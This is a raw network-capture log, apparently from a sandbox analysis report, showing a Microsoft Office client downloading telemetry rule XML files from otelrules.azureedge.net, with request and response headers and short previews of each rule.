Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA740822"
x-ms-request-id: 1138df84-701e-0097-5940-36b8c1000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-1749fc9bdbdgs9sshC1DFWt6ws00000002vg00000000003q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:32 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.5 | 49779 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:32 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:32 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-16547b76f7fr28cchC1DFWnuws0000000kz0000000000qb4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:32 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.5 | 49780 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:33 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 03bc4034-001e-00a2-3978-36d4d5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-r178fb8d765z9wvrhC1DFW1a0s00000000ug000000006p50
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:33 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.5 | 49781 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:33 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:33 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:33 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142533Z-16547b76f7fj897nhC1DFWdwq40000000kh000000000h1hk
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:33 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.2.5 | 49782 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:33 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:33 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:33 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B984BF177"
x-ms-request-id: bf27f234-e01e-003c-2019-36c70b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142533Z-r178fb8d765hbcjvhC1DFW50zc00000002q0000000009mxc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:33 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.2.5 | 49783 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:33 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:33 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:33 GMT
Content-Type: text/xml
Content-Length: 405
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
ETag: "0x8DC582B942B6AFF"
x-ms-request-id: 96cf3c30-101e-008d-3e69-3592e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142533Z-1749fc9bdbdjznvchC1DFWx4dc00000002c000000000ndhr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:33 UTC | 405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.2.5 | 49784 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:33 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:33 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:33 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA642BF4"
x-ms-request-id: 2170b64b-701e-001e-68a1-34f5e6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142533Z-r178fb8d7652w4wkhC1DFW0d7w00000002mg0000000099qs
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 76 | Source IP: 192.168.2.5 | Source Port: 49785 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:33 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:34 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:33 GMT
Content-Type: text/xml
Content-Length: 174
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91D80E15"
x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142533Z-16547b76f7f76p6chC1DFWctqw0000000ku000000000f7dc
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:34 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


Session ID: 77 | Source IP: 192.168.2.5 | Source Port: 49786 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:34 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:34 UTC | 517 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:34 GMT
Content-Type: text/xml
Content-Length: 1952
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B956B0F3D"
x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142534Z-16547b76f7fj897nhC1DFWdwq40000000kfg00000000p79d
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:34 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


Session ID: 78 | Source IP: 192.168.2.5 | Source Port: 49787 | Destination IP: 13.107.246.45 | Destination Port: 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:34 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:34 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:34 GMT
Content-Type: text/xml
Content-Length: 958
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
ETag: "0x8DC582BA0A31B3B"
x-ms-request-id: 11343522-e01e-0085-0240-36c311000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142534Z-16547b76f7f7scqbhC1DFW0m5w0000000kmg00000000c4h7
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:34 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


Session ID  Source IP    Source Port  Destination IP  Destination Port
79          192.168.2.5  49789        13.107.246.45   443

Timestamp  Bytes transferred  Direction  Data
2024-11-14 14:25:34 UTC  193  OUT  GET /rules/rule120602v10s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:34 UTC  494  IN  HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:34 GMT
Content-Type: text/xml
Content-Length: 2592
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5B890DB"
x-ms-request-id: f6eefceb-a01e-001e-33a0-3449ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142534Z-r178fb8d765jv86hhC1DFW8pt000000002q0000000008d5x
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:34 UTC  2592  IN  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


Session ID  Source IP    Source Port  Destination IP  Destination Port
80          192.168.2.5  49790        13.107.246.45   443

Timestamp  Bytes transferred  Direction  Data
2024-11-14 14:25:34 UTC  192  OUT  GET /rules/rule120601v3s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:35 UTC  494  IN  HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:34 GMT
Content-Type: text/xml
Content-Length: 3342
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
ETag: "0x8DC582B927E47E9"
x-ms-request-id: 87e60a3d-901e-0067-3833-36b5cb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142534Z-1749fc9bdbdcm45lhC1DFWeab800000002eg00000000dykw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:35 UTC  3342  IN  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        81192.168.2.54979113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: a14a0ed7-201e-0096-78aa-31ace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7fj897nhC1DFWdwq40000000kng000000009atg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:35 UTC  2284               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


Session ID  Source IP    Source Port  Destination IP  Destination Port
82          192.168.2.5  49793        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:35 UTC  192                OUT        GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:35 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7f7rtshhC1DFWrtqn0000000kw0000000003m4c
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:35 UTC  1356               IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


Session ID  Source IP    Source Port  Destination IP  Destination Port
83          192.168.2.5  49788        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:35 UTC  192                OUT        GET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:35 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f61ab913-a01e-006f-21a0-3413cd000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-1749fc9bdbd2jxtthC1DFWfk5w00000002kg000000009vu7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:35 UTC  501                IN
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


Session ID  Source IP    Source Port  Destination IP  Destination Port
84          192.168.2.5  49792        13.107.246.45   443
Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:35 UTC  192                OUT        GET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:35 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142535Z-16547b76f7f22sh5hC1DFWyb4w0000000kr0000000008axd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:35 UTC  1393               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


Session ID  Source IP    Source Port  Destination IP  Destination Port
85          192.168.2.5  49794        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:25:35 UTC  192                OUT        GET /rules/rule700201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:36 UTC  517                IN         HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:35 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
ETag: "0x8DC582BE39DFC9B"
x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142535Z-16547b76f7fkcrm9hC1DFWxdag0000000ks000000000nn5q
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
